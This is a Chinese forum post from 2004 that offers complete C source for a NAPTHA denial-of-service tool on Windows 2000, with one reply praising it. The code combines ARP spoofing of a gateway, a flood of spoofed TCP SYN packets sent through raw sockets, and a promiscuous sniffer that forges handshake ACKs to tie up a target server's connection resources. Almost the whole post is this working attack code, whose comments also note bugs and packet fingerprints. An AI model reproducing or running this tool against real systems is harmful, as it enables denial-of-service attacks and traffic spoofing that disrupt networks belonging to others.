论坛: 编程破解 标题: [原创]NAPTHA攻击方式在2K下的简单实现 复制本贴地址    
作者: LionD8 [liond8]    论坛用户   登录
/*
《NAPTHA攻击方式在2K下的简单实现》

  作者:LionD8
  EMAIL:liond8@eyou.com
  QQ: 10415468
  2004.2.16 凌晨


  简单原理:
  1.欺骗网关,让网关知道幻影主机的MAC.
  2.嗅探局域网中的所有数据包,判断是不是返回给虚幻主机的
  第2次握手的数据包。如果是,就伪造第3次握手.
  3.发送伪造的SYN报文.
 
  通过消耗对方的维护连接的资源进行DOS。占用通道等。

  详细原理请见Warning3老大整理的 《新型网络DoS(拒绝服务)攻击漏洞 - "Naptha"》
  我就不废话了。
  地址: http://www.nsfocus.net/index.php?act=magazine&do=view&mid=721

*/

///////////////////////////////////////////////////
//以下代码在2K VC6.0下编译通过
//在虚拟机上测试,好像2k系统如《新型网络DoS(拒绝服务)攻击漏洞 - "Naptha"》
//所说,不受什么影响.
///////////////////////////////////////////////////


#include "stdio.h"
#include "Packet32.h"
#include "windows.h"
#include <ws2tcpip.h>
#include "winsock2.h"
#include "wchar.h"

#define EPT_IP 0x0800         // EtherType: IPv4
#define EPT_ARP 0x0806        // EtherType: ARP
#define ARP_HARDWARE 0x0001   // ARP hardware type: Ethernet
#define ARP_REQUEST 0x0001    // ARP opcode: request (ThreadArpSnoop writes the literal 1 instead)
#define ARP_REPLY 0x0002      // ARP opcode: reply (unused in this file)

#define NDIS_PACKET_TYPE_PROMISCUOUS 0x0020 // promiscuous-mode filter value passed to PacketSetHwFilter

#pragma comment(lib, "packet.lib")
#pragma comment(lib, "ws2_32.lib")

#pragma pack(push, 1)

// Ethernet II frame header, 14 bytes (packed by the surrounding #pragma pack(push, 1)).
typedef struct ehhdr
{
    UCHAR    eh_dst[6];     // destination MAC
    UCHAR    eh_src[6];     // source MAC
    USHORT  eh_type;        // EtherType in network byte order (EPT_IP / EPT_ARP)
}EHHEADR, *PEHHEADR;

// ARP header for Ethernet/IPv4, 28 bytes (packed). Only the request form is
// built in this file (ThreadArpSnoop); multi-byte fields are stored in
// network byte order.
typedef struct arphdr
{
    USHORT    arp_hrd;         // hardware type (ARP_HARDWARE = Ethernet)
    USHORT    arp_pro;         // protocol type (EPT_IP)
    UCHAR    arp_hln;          // hardware address length, set to 6
    UCHAR    arp_pln;          // protocol address length, set to 4
    USHORT    arp_op;          // opcode: ARP_REQUEST / ARP_REPLY
    UCHAR    arp_sha[6];       // sender hardware address
    ULONG    arp_spa;          // sender IPv4 address (4 bytes)
    UCHAR    arp_tha[6];       // target hardware address (zeroed in a request)
    ULONG    arp_tpa;          // target IPv4 address
}ARPHEADR, *PARPHEADR;

// Complete ARP frame as written to the wire: Ethernet header + ARP header,
// 42 bytes in total. ThreadArpSnoop copies it into a zeroed buffer and queues
// 60 bytes, so the tail is zero padding (presumably to reach the minimum
// Ethernet frame size).
typedef struct arpPacket
{
    EHHEADR    ehhdr;
    ARPHEADR  arphdr;
} ARPPACKET, *PARPPACKET;

#pragma pack(pop)

// IPv4 header without options, 20 bytes. Declared after #pragma pack(pop),
// but every field sits on its natural alignment, so no padding is inserted.
// Multi-byte fields are meant to be in network byte order; note that both
// senders in this file store ident as a plain host-order 1.
typedef struct ip_head     
{
unsigned char h_verlen;   // version in the high nibble, header length in 32-bit words in the low nibble
unsigned char tos;       
unsigned short total_len; // total datagram length (network order)
unsigned short ident;     
unsigned short frag_and_flags;
unsigned char ttl;       
unsigned char proto;     // IPPROTO_TCP in this file
unsigned short checksum; // left at 0 by both senders in this file
unsigned int sourceIP;   
unsigned int destIP;       
}IPHEADER;


// TCP header without options, 20 bytes. th_lenres carries the data offset in
// its high nibble; th_flag carries the control bits (this file uses 0x02 SYN,
// 0x10 ACK and matches 0x12 SYN|ACK). th_sum is computed over
// PSDHEADER + this struct with th_sum itself zeroed.
typedef struct tcp_head 
{
USHORT th_sport;
USHORT th_dport;
unsigned int th_seq;
unsigned int th_ack;
unsigned char th_lenres;  // data offset << 4 | reserved bits
unsigned char th_flag;    // control flags
USHORT th_win;  
USHORT th_sum;
USHORT th_urp;
}TCPHEADER;

// TCP pseudo-header, 12 bytes. It is placed in front of the TCP header only
// while the TCP checksum is computed and is never sent. (The struct tag reads
// "tsd" but the typedef is PSDHEADER.)
typedef struct tsd_hdr 
{
unsigned long saddr;  // source IP, network order
unsigned long daddr;  // destination IP, network order
char mbz;             // must be zero
char ptcl;            // protocol, IPPROTO_TCP
unsigned short tcpl;  // TCP segment length (header only here), network order
}PSDHEADER;


DWORD  WINAPI  ThreadArpSnoop(LPVOID lp);
USHORT checksum(USHORT *buffer, int size);
DWORD  WINAPI  ThreadSynFlood(LPVOID lp);
DWORD  WINAPI SnifferSynAck(LPVOID lp);
void SendAck ( DWORD SEQ , DWORD ACK ,USHORT SPort);
void AnalyseData (LPPACKET lpPacket);


#define ATPORT 80 // target TCP port
#define ATIP "192.168.1.1" // target IP (hard-coded; used by ThreadSynFlood and SendAck)
#define GATE "192.168.85.1" // gateway IP that the ARP request is addressed to
#define SNOOPIP "192.168.85.250" // IP of the phantom host whose identity is borrowed
#define SLEEPTIME 1000 // milliseconds between SYNs in ThreadSynFlood
UCHAR DMacAddr[6]={0xFF,0xFF,0xFF,0xFF,0xFF,0xFF}; // Ethernet broadcast address
UCHAR SMacAddr[6]={0xFF,0xFF,0xFF,0xFF,0xFF,0xFE}; // phantom host's MAC; also the match key in AnalyseData

// Start-up handshake flag shared between main() and the worker threads:
// main() clears it, a thread sets it once its adapter prompt is done.
// Plain BOOL polled from another thread, neither volatile nor atomic.
BOOL  IsGoOn = TRUE;

// Entry point. Starts the three worker threads in order — ARP announcer,
// SYN/ACK sniffer, SYN sender — and then sleeps forever. IsGoOn is a crude
// start-up barrier: main() clears it and spins until the thread it just
// started has finished its interactive adapter prompt, so the two prompts do
// not interleave. There is no shutdown path, the handles returned by
// CreateThread are discarded, and IsGoOn is a plain non-volatile BOOL polled
// across threads (a data race). `void main` is non-standard.
void main()
{

IsGoOn = FALSE;
// NULL is passed for the integer parameters dwStackSize and dwCreationFlags (meaning 0).
CreateThread(NULL,NULL,ThreadArpSnoop,NULL,NULL,NULL);

while ( !IsGoOn )
Sleep(1);
IsGoOn = FALSE;
CreateThread(NULL,NULL,SnifferSynAck,NULL,NULL,NULL);
while ( !IsGoOn )
Sleep(1);
// The SYN sender has no prompt, so nothing waits for it.
CreateThread(NULL,NULL,ThreadSynFlood,NULL,NULL,NULL);

while (1)
Sleep(1000000);


}

// ARP announcer thread. Prompts for a WinPcap adapter, then every 30 s
// broadcasts an ARP request whose sender fields are the phantom host
// (SMacAddr / SNOOPIP) and whose target is GATE, so that — per the header
// comment — the gateway learns the phantom MAC for SNOOPIP. Sets IsGoOn after
// the adapter prompt so main() can start the next thread. The send loop is
// infinite, so the cleanup after it is unreachable. `lp` is unused.
//
// Detection note: the sender hardware address FF:FF:FF:FF:FF:FE has the
// group bit set and is therefore not a valid unicast source.
DWORD  WINAPI  ThreadArpSnoop(LPVOID lp)
{
    static CHAR  AdapterList[10][1024];   // at most 10 names of 1024 bytes; neither bound is checked below
    TCHAR szPacketBuf[512];
    LPADAPTER    lpAdapter;
    LPPACKET    lpPacket;
    WCHAR        AdapterName[2048];
    WCHAR        *temp,*temp1;
    ARPPACKET    ARPPacket;
    ULONG AdapterLength = 1024;
    DWORD AdapterNum = 0;
    DWORD nRetCode, i;

    if(PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE)
    {
printf("Unable to retrieve the list of the adapters!\n");
        return 0;
    }
    // Split the double-NUL-terminated wide name list into AdapterList rows.
    // On the first iteration temp == AdapterName, so *(temp-1) reads one
    // element before the array: an out-of-bounds read (undefined behaviour).
    temp = AdapterName;
    temp1=AdapterName;
    i = 0;
    while ((*temp != '\0')||(*(temp-1) != '\0'))
    {
        if (*temp == '\0')
        {
            // Raw WCHAR bytes are copied into a CHAR row; there is no check that
            // the name fits in 1024 bytes or that i stays below 10.
            memcpy(AdapterList[i],temp1,(temp-temp1)*sizeof(WCHAR));
            temp1=temp+1;
            i++;
        }
        temp++;
    }
    AdapterNum = i;
    for (i = 0; i < AdapterNum; i++)
    wprintf(L"\n%d- %s\n", i+1, AdapterList[i]);
printf("\nPlease select adapter number:");
// scanf's result is not checked and i is unsigned: an input of 0 passes the
// test below, and AdapterList[i-1] then indexes with i-1 == 0xFFFFFFFF.
scanf("%d",&i);    
if(i>AdapterNum)
{
printf("\nInput Number error!");
return 0;
}

IsGoOn = TRUE; // main() is released before the adapter is actually opened
    lpAdapter = (LPADAPTER) PacketOpenAdapter((LPTSTR) AdapterList[i-1]);
    if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))
    {
        nRetCode = GetLastError();
        printf("Unable to open the driver, Error Code : %lx\n", nRetCode);
        return 0;
    }

    lpPacket = PacketAllocatePacket();
    if(lpPacket == NULL)
    {
        printf("\nError:failed to allocate the LPPACKET structure.");
        return 0;
    }
    // Build the ARP request: broadcast destination, phantom MAC/IP as sender,
    // GATE with an all-zero MAC as target.
memset(szPacketBuf, 0, sizeof(szPacketBuf));
    memcpy(ARPPacket.ehhdr.eh_dst, DMacAddr, 6);   
    memcpy(ARPPacket.ehhdr.eh_src, SMacAddr, 6);   
ARPPacket.ehhdr.eh_type  = htons(EPT_ARP);
    ARPPacket.arphdr.arp_hrd = htons(ARP_HARDWARE);
    ARPPacket.arphdr.arp_pro = htons(EPT_IP);
ARPPacket.arphdr.arp_hln = 6;
    ARPPacket.arphdr.arp_pln = 4;
    ARPPacket.arphdr.arp_op = htons(1); // ARP_REQUEST written as a literal
memcpy(ARPPacket.arphdr.arp_sha, SMacAddr, 6); 
    ARPPacket.arphdr.arp_spa = inet_addr(SNOOPIP); 
memset(ARPPacket.arphdr.arp_tha,0,6);
ARPPacket.arphdr.arp_tpa = inet_addr(GATE);
    memcpy(szPacketBuf, (char*)&ARPPacket, sizeof(ARPPacket));   
// 60 bytes are queued although the ARP frame is 42; the rest is the zeroed tail of szPacketBuf.
PacketInitPacket(lpPacket, szPacketBuf, 60);

    if(PacketSetNumWrites(lpAdapter, 1)==FALSE)
    {
        printf("warning: Unable to send more than one packet in a single write!\n");
    }
// Re-announce every 30 s; a send failure is the only way out of the loop.
while ( 1 )
{
if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE)
{
printf("Error sending the packets!\n");
return 0; // lpPacket and lpAdapter are not released on this path
}
Sleep(30000);
}
    // Unreachable: the loop above never exits normally.
    PacketFreePacket(lpPacket);
    PacketCloseAdapter(lpAdapter);
    return 0;
}


// SYN sender thread. Opens a raw IP socket with IP_HDRINCL and, once per
// SLEEPTIME, sends one TCP SYN to ATIP:ATPORT with the phantom host SNOOPIP as
// source address and a tick-derived source port. The loop is infinite, so the
// closesocket/WSACleanup at the end are unreachable; every error return taken
// after socket() succeeds leaks the socket and skips WSACleanup. `lp` is unused.
//
// The function is declared DWORD but returns `false` on several paths; that,
// and the use of true/false and of bpf_hdr without `struct`, show the file is
// compiled as C++ (VC6).
//
// Detection note: every SYN carries the same ISN 0x12345678, TTL 123, window
// 512 and an un-swapped IP id of 1; the source port is GetTickCount()%65534,
// so port 0 is possible.
DWORD  WINAPI  ThreadSynFlood(LPVOID lp)
{
WSADATA WSAData;
SOCKET sock;
SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
int SourcePort;

char szSendBuf[60]={0}; // 40 bytes are used: IP header + TCP header
BOOL flag;
int rect,nTimeOver;
if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0)
{
printf("WSAStartup Error!\n");
return 0;
}

sock=NULL;
// Raw IP socket; the IP header is supplied by this code (IP_HDRINCL below).
// Raw sockets normally require administrative rights, and later Windows
// versions restrict what they may send — neither is visible from this file.
if ((sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)
{
printf("Socket Setup Error!\n");
return 0;
}

flag=true;
if (setsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag))==SOCKET_ERROR)
{
printf("setsockopt IP_HDRINCL error!\n");
return false; // sock leaked, WSACleanup skipped
}

nTimeOver=1000;
if (setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char*)&nTimeOver, sizeof(nTimeOver))==SOCKET_ERROR)                                // send timeout, 1000 ms
{
printf("setsockopt SO_SNDTIMEO error!\n");
return false; // sock leaked, WSACleanup skipped
}

addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(ATPORT);
addr_in.sin_addr.S_un.S_addr=inet_addr(ATIP);
ipHeader.h_verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); // version 4, IHL = 20/4 = 5
ipHeader.tos=0;
ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader));    // total IP length: 40 bytes
ipHeader.ident=1; // not byte-swapped, so it appears on the wire as 0x0100
ipHeader.frag_and_flags=0;               
ipHeader.ttl=123;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0; // never computed here; whether the stack fills it in under IP_HDRINCL is not shown
ipHeader.destIP=inet_addr(ATIP);
tcpHeader.th_dport=htons(ATPORT);
tcpHeader.th_ack=0;
tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0); // data offset 5, no options
tcpHeader.th_flag=2; // SYN
tcpHeader.th_win=htons(512);
tcpHeader.th_urp=0;
tcpHeader.th_seq=htonl(0x12345678);     // fixed ISN; AnalyseData keys on ack == this + 1

psdHeader.daddr=ipHeader.destIP;
psdHeader.mbz=0;
psdHeader.ptcl=IPPROTO_TCP;
psdHeader.tcpl=htons(sizeof(tcpHeader));

ipHeader.sourceIP=inet_addr(SNOOPIP); // spoofed source: the phantom host
while(TRUE)
{
SourcePort=GetTickCount()%65534; // range 0..65533

tcpHeader.th_sport=htons(SourcePort);
tcpHeader.th_sum=0;
psdHeader.saddr=ipHeader.sourceIP;

// TCP checksum over pseudo-header + TCP header, with th_sum zeroed first.
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.th_sum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));


// The same buffer is reused for the real datagram: the 20-byte IP header
// overwrites the 12-byte pseudo-header and part of the earlier TCP copy,
// so the TCP header is copied again at offset 20.
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));

rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader), 0, (struct sockaddr*)&addr_in, sizeof(addr_in));
if (rect==SOCKET_ERROR)
{
printf("send error!:%x\n",WSAGetLastError());
return false; // sock leaked, WSACleanup skipped
}
else printf("send ok!\n");

Sleep(SLEEPTIME);
}//endwhile    
// Unreachable: the loop above never exits normally.
closesocket(sock);
WSACleanup();
return 0;
}

/*
 * One's-complement Internet checksum (RFC 1071 style) over `size` bytes
 * starting at `buffer`, returned as a 16-bit value ready to be stored in a
 * header field. The callers in this file use it on the TCP pseudo-header
 * followed by the TCP header. A trailing odd byte is added as a single
 * zero-extended byte. `size` is an int, as in the original: a non-positive
 * size skips the word loop, and any non-zero remainder still reads one byte.
 */
USHORT checksum(USHORT *buffer, int size)
{
    unsigned long acc = 0;
    const USHORT *word = buffer;
    int remaining = size;

    /* Accumulate whole 16-bit words. */
    for (; remaining > 1; remaining -= (int)sizeof(USHORT))
    {
        acc += *word++;
    }

    /* Odd trailing byte, if any. */
    if (remaining != 0)
    {
        acc += *(const UCHAR *)word;
    }

    /* Fold the 32-bit sum into 16 bits; the second step absorbs the
     * carry the first fold can itself produce. */
    acc = (acc >> 16) + (acc & 0xffffUL);
    acc += acc >> 16;

    return (USHORT)(~acc);
}

// Capture thread. Prompts for a WinPcap adapter (the same list-parsing code,
// with the same defects, as ThreadArpSnoop), puts the adapter in promiscuous
// mode, then loops forever reading packets and handing each read buffer to
// AnalyseData, which replies to SYN/ACKs addressed to the phantom MAC. Sets
// IsGoOn after the adapter prompt. Declared DWORD, yet one path returns -1.
// `lp` and `adapter_num` are unused.
DWORD WINAPI SnifferSynAck(LPVOID lp)
{
LPADAPTER lpAdapter;
static CHAR AdapterList[10][1024]; // at most 10 names of 1024 bytes; neither bound is checked below
ULONG AdapterNum;
WCHAR      AdapterName[2048];
    WCHAR      *temp,*temp1;
ULONG AdapterLength=1024;
ULONG i,adapter_num=0;

if(PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE)
    {
printf("Unable to retrieve the list of the adapters!\n");
        return 0;
    }
    // Split the double-NUL-terminated wide name list into AdapterList rows.
    // On the first iteration temp == AdapterName, so *(temp-1) reads one
    // element before the array: an out-of-bounds read (undefined behaviour).
    temp = AdapterName;
    temp1=AdapterName;
    i = 0;
    while ((*temp != '\0')||(*(temp-1) != '\0'))
    {
        if (*temp == '\0')
        {
            // No check that the name fits in 1024 bytes or that i stays below 10.
            memcpy(AdapterList[i],temp1,(temp-temp1)*sizeof(WCHAR));
            temp1=temp+1;
            i++;
        }
        temp++;
    }
    AdapterNum = i;
    for (i = 0; i < AdapterNum; i++)
    wprintf(L"\n%d- %s\n", i+1, AdapterList[i]);
printf("\nPlease select adapter number:");
// scanf's result is not checked and i is unsigned: an input of 0 passes the
// test below, and AdapterList[i-1] then indexes with i-1 == 0xFFFFFFFF.
scanf("%d",&i);    
if(i>AdapterNum)
{
printf("\nInput Number error!");
return 0;
}
IsGoOn = TRUE; // main() is released before the adapter is actually opened

lpAdapter=(LPADAPTER)PacketOpenAdapter((LPTSTR)AdapterList[i-1]);
    if (!lpAdapter||(lpAdapter->hFile==INVALID_HANDLE_VALUE))
    {
        printf("Unable to open the driver, Error Code : %lx\n", GetLastError());
        return 0;
    }

    // Put the adapter in promiscuous mode so frames for the phantom MAC are captured.
if(PacketSetHwFilter(lpAdapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE)
    {
        printf("Warning: Unable to set the adapter to promiscuous mode\n");
    }

// 10 KB driver buffer; the per-read buffer below has the same size.
if(PacketSetBuff(lpAdapter,1024*10)==FALSE)
    {
        printf("PacketSetBuff Error: %d\n",GetLastError());
        return -1; // -1 from a DWORD function: wraps to 0xFFFFFFFF
    }

while ( 1 )
{
TCHAR Buffer[1024*10]={0}; // 10 K TCHARs on the stack each iteration (20 KB when UNICODE is defined)
LPPACKET lpPacket;
lpPacket=PacketAllocatePacket();       // NULL is not checked before PacketInitPacket
PacketInitPacket(lpPacket,Buffer,sizeof(Buffer)); 
// Return value and received length are not checked; AnalyseData is called
// on the (zero-initialised) buffer even when the read fails.
PacketReceivePacket(lpAdapter,lpPacket,TRUE);
// Only the packet at the start of the buffer is examined; if the driver
// batches several captured packets into one read, the rest are ignored.
AnalyseData( lpPacket );
PacketFreePacket(lpPacket);

}
return 0;
}

// Inspects one captured packet. Expects a WinPcap bpf_hdr followed by an
// Ethernet II frame. If the frame's EtherType is IP and its destination MAC is
// the phantom SMacAddr, the TCP header is taken at a fixed offset (a 20-byte
// IP header is assumed; neither the IP protocol field nor the IP header length
// is checked). When that header is a SYN|ACK (0x12) whose ack number is
// 0x12345679 — the fixed ISN used by ThreadSynFlood plus one — SendAck is
// called to finish the handshake.
//
// No length is checked against the capture header, so a short captured frame
// is read past its end. th_ack is compared in network byte order; ntohl() is
// applied to a host constant where htonl() is meant (same result on all
// common platforms, but misleading).
void AnalyseData (LPPACKET lpPacket)
{
char *Buf;
EHHEADR *lpEthdr;
bpf_hdr *lpBpfhdr;
Buf=(char *)lpPacket->Buffer;
    lpBpfhdr=(bpf_hdr *)Buf;
lpEthdr=(EHHEADR *)(Buf+lpBpfhdr->bh_hdrlen); // Ethernet frame starts after the bpf header
if(lpEthdr->eh_type==htons(0x0800) && (!memcmp(lpEthdr->eh_dst,SMacAddr,6)) ) // 0x0800 == EPT_IP
{
TCPHEADER *lpTcphdr;
lpTcphdr=(TCPHEADER *)(Buf+lpBpfhdr->bh_hdrlen+sizeof(EHHEADR)+sizeof(IPHEADER));

if ( lpTcphdr->th_ack == ntohl(0x12345678+1) && lpTcphdr->th_flag == 0x12) // 0x12 == SYN|ACK
{
// seq, ack and the peer's port are passed along in network byte order, as captured
SendAck(lpTcphdr->th_seq,lpTcphdr->th_ack,lpTcphdr->th_dport);
}
}

}

// Sends the third handshake segment (a pure ACK) from the phantom host to
// ATIP:ATPORT. SEQ, ACK and SPort are the values captured from the peer's
// SYN|ACK, still in network byte order: our ack = their seq + 1, our seq =
// their ack, our source port = their destination port. A new raw socket is
// opened on every call; it is leaked on the setsockopt and sendto error
// paths. WSAStartup is not called here — it relies on ThreadSynFlood having
// done so, and main() starts that thread after the sniffer that calls this.
void SendAck ( DWORD SEQ , DWORD ACK ,USHORT SPort)
{
SOCKET sock;
SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;

char szSendBuf[60]={0}; // 40 bytes are used: IP header + TCP header
BOOL flag;
int rect,nTimeOver;

sock=NULL;
if ((sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)
{
printf("Socket Setup Error!\n");
return ;
}

flag=true;
if (setsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag))==SOCKET_ERROR)
{
printf("setsockopt IP_HDRINCL error!\n");
return ; // sock leaked
}

nTimeOver=1000;
if (setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char*)&nTimeOver, sizeof(nTimeOver))==SOCKET_ERROR)                                // send timeout, 1000 ms
{
printf("setsockopt SO_SNDTIMEO error!\n");
return ; // sock leaked
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(ATPORT);
addr_in.sin_addr.S_un.S_addr=inet_addr(ATIP);
ipHeader.h_verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); // version 4, IHL = 20/4 = 5
ipHeader.tos=0;
ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader));    // total IP length: 40 bytes
ipHeader.ident=1; // not byte-swapped, so it appears on the wire as 0x0100
ipHeader.frag_and_flags=0;               
ipHeader.ttl=123;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0; // never computed here
ipHeader.destIP=inet_addr(ATIP);
tcpHeader.th_dport=htons(ATPORT);
tcpHeader.th_ack=htonl((ntohl(SEQ)+1)); // acknowledge the peer's ISN
tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0); // data offset 5, no options
tcpHeader.th_flag=0x10; // ACK
tcpHeader.th_win=htons(512);
tcpHeader.th_urp=0;
tcpHeader.th_seq=ACK; // already network order; equals our ISN + 1 as echoed by the peer
psdHeader.daddr=ipHeader.destIP;
psdHeader.mbz=0;
psdHeader.ptcl=IPPROTO_TCP;
psdHeader.tcpl=htons(sizeof(tcpHeader));

ipHeader.sourceIP=inet_addr(SNOOPIP); // spoofed source: the phantom host
tcpHeader.th_sport=SPort; // network order, as captured
tcpHeader.th_sum=0;
psdHeader.saddr=ipHeader.sourceIP;
// TCP checksum over pseudo-header + TCP header, then rebuild the buffer as
// IP header + TCP header (the IP header overwrites the pseudo-header).
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.th_sum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader), 0, (struct sockaddr*)&addr_in, sizeof(addr_in));
if (rect==SOCKET_ERROR)
{
printf("send error!:%x\n",WSAGetLastError());
return ; // sock leaked
}
else printf("send ok!\n");
closesocket(sock);

}

//参考文献: 《新型网络DoS(拒绝服务)攻击漏洞 - "Naptha"》
//http://www.nsfocus.net/index.php?act=magazine&do=view&mid=721
//不要攻击国内的服务器。请用自己的机器测试。
//如果擅自攻击者过后自负。

//以上是自己的一点愚解。如果有什么误解欢迎指正.


地主 发表时间: 04-02-16 01:09

回复: 沙加II [newmyth21]   论坛用户   登录
原创的,我顶一下吧

[此贴被 沙加II(newmyth21) 在 02月17日12时13分 编辑过]

B1层 发表时间: 04-02-17 12:12
